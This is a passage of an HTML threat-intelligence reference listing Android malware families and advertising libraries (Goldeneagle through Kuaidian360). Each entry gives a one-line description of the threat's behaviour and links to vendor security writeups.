<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-070608-4139-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-070608-4139-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_goldeneagle"><a class="anchor" href="#_goldeneagle"></a><a class="link" href="#_goldeneagle">Goldeneagle</a></h3>
<div class="paragraph">
<p>Goldeneagle is a Trojan horse that steals information from Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 185. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-090110-3712-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-090110-3712-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_golocker"><a class="anchor" href="#_golocker"></a><a class="link" href="#_golocker">Golocker</a></h3>
<div class="paragraph">
<p>Golocker is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 186. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-062003-3214-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-062003-3214-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gomal"><a class="anchor" href="#_gomal"></a><a class="link" href="#_gomal">Gomal</a></h3>
<div class="paragraph">
<p>Gomal is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 187. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-101312-1047-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-101312-1047-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gonesixty"><a class="anchor" href="#_gonesixty"></a><a class="link" href="#_gonesixty">Gonesixty</a></h3>
<div class="paragraph">
<p>Gonesixty is a Trojan horse that steals information from Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 188. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-093001-2649-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-093001-2649-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gonfu"><a class="anchor" href="#_gonfu"></a><a class="link" href="#_gonfu">Gonfu</a></h3>
<div class="paragraph">
<p>Gonfu is a Trojan horse that steals information from Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 189. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-060610-3953-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-060610-3953-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gonfu_b"><a class="anchor" href="#_gonfu_b"></a><a class="link" href="#_gonfu_b">Gonfu.B</a></h3>
<div class="paragraph">
<p>Gonfu.B is a Trojan horse that steals information from Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 190. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-030811-5215-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-030811-5215-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gonfu_c"><a class="anchor" href="#_gonfu_c"></a><a class="link" href="#_gonfu_c">Gonfu.C</a></h3>
<div class="paragraph">
<p>Gonfu.C is a Trojan horse for Android devices that may download additional threats on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 191. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-031817-3639-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-031817-3639-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gonfu_d"><a class="anchor" href="#_gonfu_d"></a><a class="link" href="#_gonfu_d">Gonfu.D</a></h3>
<div class="paragraph">
<p>Gonfu.D is a Trojan horse that opens a back door on Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 192. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-040414-1158-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-040414-1158-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gooboot"><a class="anchor" href="#_gooboot"></a><a class="link" href="#_gooboot">Gooboot</a></h3>
<div class="paragraph">
<p>Gooboot is a Trojan horse for Android devices that may send text messages to premium rate numbers.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 193. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-031818-3034-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-031818-3034-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_goodadpush"><a class="anchor" href="#_goodadpush"></a><a class="link" href="#_goodadpush">Goodadpush</a></h3>
<div class="paragraph">
<p>Goodadpush is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 194. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040108-0913-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040108-0913-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_greystripe"><a class="anchor" href="#_greystripe"></a><a class="link" href="#_greystripe">Greystripe</a></h3>
<div class="paragraph">
<p>Greystripe is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 195. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052919-2643-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052919-2643-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gugespy"><a class="anchor" href="#_gugespy"></a><a class="link" href="#_gugespy">Gugespy</a></h3>
<div class="paragraph">
<p>Gugespy is a spyware program for Android devices that logs the device&#8217;s activity and sends it to a predetermined email address.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 196. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-071822-2515-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-071822-2515-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gugespy_b"><a class="anchor" href="#_gugespy_b"></a><a class="link" href="#_gugespy_b">Gugespy.B</a></h3>
<div class="paragraph">
<p>Gugespy.B is a spyware program for Android devices that monitors and sends certain information to a remote location.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 197. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-070511-5038-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-070511-5038-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gupno"><a class="anchor" href="#_gupno"></a><a class="link" href="#_gupno">Gupno</a></h3>
<div class="paragraph">
<p>Gupno is a Trojan horse for Android devices that poses as a legitimate app and attempts to charge users for features that are normally free. It may also display advertisements on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 198. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2015-072211-5533-99">https://www.symantec.com/security_response/writeup.jsp?docid=2015-072211-5533-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_habey"><a class="anchor" href="#_habey"></a><a class="link" href="#_habey">Habey</a></h3>
<div class="paragraph">
<p>Habey is a Trojan horse for Android devices that may attempt to delete files and send SMS messages from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 199. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-100608-4512-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-100608-4512-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_handyclient"><a class="anchor" href="#_handyclient"></a><a class="link" href="#_handyclient">Handyclient</a></h3>
<div class="paragraph">
<p>Handyclient is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 200. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040307-5027-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040307-5027-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hehe"><a class="anchor" href="#_hehe"></a><a class="link" href="#_hehe">Hehe</a></h3>
<div class="paragraph">
<p>Hehe is a Trojan horse for Android devices that blocks incoming calls and SMS messages from specific numbers. The Trojan also steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 201. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-012211-0020-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-012211-0020-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hesperbot"><a class="anchor" href="#_hesperbot"></a><a class="link" href="#_hesperbot">Hesperbot</a></h3>
<div class="paragraph">
<p>Hesperbot is a Trojan horse for Android devices that opens a back door on the compromised device and may steal information.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 202. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-121010-1120-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-121010-1120-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hippo"><a class="anchor" href="#_hippo"></a><a class="link" href="#_hippo">Hippo</a></h3>
<div class="paragraph">
<p>Hippo is a Trojan horse that sends SMS messages to premium-rate phone numbers.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 203. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-071215-3547-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-071215-3547-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hippo_b"><a class="anchor" href="#_hippo_b"></a><a class="link" href="#_hippo_b">Hippo.B</a></h3>
<div class="paragraph">
<p>Hippo.B is a Trojan horse that sends SMS messages to premium-rate phone numbers.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 204. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-031915-0151-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-031915-0151-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_iadpush"><a class="anchor" href="#_iadpush"></a><a class="link" href="#_iadpush">IadPush</a></h3>
<div class="paragraph">
<p>IadPush is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 205. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040315-4104-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040315-4104-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ibanking"><a class="anchor" href="#_ibanking"></a><a class="link" href="#_ibanking">iBanking</a></h3>
<div class="paragraph">
<p>iBanking is a Trojan horse for Android devices that opens a back door on the compromised device and may steal information.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 206. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-030713-0559-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-030713-0559-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_iconosis"><a class="anchor" href="#_iconosis"></a><a class="link" href="#_iconosis">Iconosis</a></h3>
<div class="paragraph">
<p>Iconosis is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 207. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-062107-3327-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-062107-3327-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_iconosys"><a class="anchor" href="#_iconosys"></a><a class="link" href="#_iconosys">Iconosys</a></h3>
<div class="paragraph">
<p>Iconosys is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 208. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-081309-0341-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-081309-0341-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_igexin"><a class="anchor" href="#_igexin"></a><a class="link" href="#_igexin">Igexin</a></h3>
<div class="paragraph">
<p>Igexin is an advertisement library that is bundled with certain Android applications. Igexin has the capability of spying on victims through otherwise benign apps by downloading malicious plugins,</p>
</div>
<div class="paragraph">
<p>Igexin is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>IcicleGum</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 209. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2015-032606-5519-99">https://www.symantec.com/security_response/writeup.jsp?docid=2015-032606-5519-99</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf">https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.lookout.com/igexin-malicious-sdk">https://blog.lookout.com/igexin-malicious-sdk</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_imadpush"><a class="anchor" href="#_imadpush"></a><a class="link" href="#_imadpush">ImAdPush</a></h3>
<div class="paragraph">
<p>ImAdPush is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 210. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040323-0218-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040323-0218-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_inmobi"><a class="anchor" href="#_inmobi"></a><a class="link" href="#_inmobi">InMobi</a></h3>
<div class="paragraph">
<p>InMobi is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 211. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052713-1527-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052713-1527-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_jifake"><a class="anchor" href="#_jifake"></a><a class="link" href="#_jifake">Jifake</a></h3>
<div class="paragraph">
<p>Jifake is a Trojan horse for Android devices that sends SMS messages to premium-rate phone numbers.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 212. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-073021-4247-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-073021-4247-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_jollyserv"><a class="anchor" href="#_jollyserv"></a><a class="link" href="#_jollyserv">Jollyserv</a></h3>
<div class="paragraph">
<p>Jollyserv is a Trojan horse for Android devices that sends SMS messages and steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 213. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-090311-4533-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-090311-4533-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_jsmshider"><a class="anchor" href="#_jsmshider"></a><a class="link" href="#_jsmshider">Jsmshider</a></h3>
<div class="paragraph">
<p>Jsmshider is a Trojan horse that opens a back door on Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 214. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-062114-0857-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-062114-0857-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ju6"><a class="anchor" href="#_ju6"></a><a class="link" href="#_ju6">Ju6</a></h3>
<div class="paragraph">
<p>Ju6 is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 215. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-2428-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-2428-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_jumptap"><a class="anchor" href="#_jumptap"></a><a class="link" href="#_jumptap">Jumptap</a></h3>
<div class="paragraph">
<p>Jumptap is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 216. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052713-0859-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052713-0859-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_jzmob"><a class="anchor" href="#_jzmob"></a><a class="link" href="#_jzmob">Jzmob</a></h3>
<div class="paragraph">
<p>Jzmob is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 217. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-1703-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-1703-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kabstamper"><a class="anchor" href="#_kabstamper"></a><a class="link" href="#_kabstamper">Kabstamper</a></h3>
<div class="paragraph">
<p>Kabstamper is a Trojan horse for Android devices that corrupts images found on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 218. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-060706-2305-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-060706-2305-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kidlogger"><a class="anchor" href="#_kidlogger"></a><a class="link" href="#_kidlogger">Kidlogger</a></h3>
<div class="paragraph">
<p>Kidlogger is a Spyware application for Android devices that logs the device&#8217;s activity and sends it to a predetermined website.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 219. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-122014-1927-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-122014-1927-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kielog"><a class="anchor" href="#_kielog"></a><a class="link" href="#_kielog">Kielog</a></h3>
<div class="paragraph">
<p>Kielog is a Trojan horse for Android devices that logs keystrokes and sends the stolen information to the remote attacker.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 220. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-040205-4035-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-040205-4035-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kituri"><a class="anchor" href="#_kituri"></a><a class="link" href="#_kituri">Kituri</a></h3>
<div class="paragraph">
<p>Kituri is a Trojan horse for Android devices that blocks certain SMS messages from being received by the device. It may also send SMS messages to a premium-rate number.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 221. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-061111-5350-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-061111-5350-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kranxpay"><a class="anchor" href="#_kranxpay"></a><a class="link" href="#_kranxpay">Kranxpay</a></h3>
<div class="paragraph">
<p>Kranxpay is a Trojan horse for Android devices that downloads other apps onto the device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 222. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-071009-0809-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-071009-0809-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_krysanec"><a class="anchor" href="#_krysanec"></a><a class="link" href="#_krysanec">Krysanec</a></h3>
<div class="paragraph">
<p>Krysanec is a Trojan horse for Android devices that opens a back door on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 223. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-090113-4128-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-090113-4128-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kuaidian360"><a class="anchor" href="#_kuaidian360"></a><a class="link" href="#_kuaidian360">Kuaidian360</a></h3>
<div class="paragraph">
<p>Kuaidian360 is an advertisement library that is bundled with certain Android applications.</p>
</div>
